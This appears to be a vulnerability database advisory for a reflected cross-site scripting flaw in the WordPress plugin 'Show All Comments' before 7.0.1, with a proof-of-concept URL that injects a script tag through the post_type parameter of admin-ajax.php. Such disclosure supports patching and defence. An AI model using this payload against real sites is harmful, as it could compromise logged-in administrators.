WordPress Plugin Vulnerabilities

Show All Comments < 7.0.1 - Reflected XSS

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.

Proof of Concept

Visit the following URL (authenticated or not) to trigger an alert box:

http://example.com/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(`xss`);</script>

Affects Plugins

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-12-23 (about 1 years ago)
Added
2022-12-23 (about 1 years ago)
Last Updated
2022-12-23 (about 1 years ago)

Other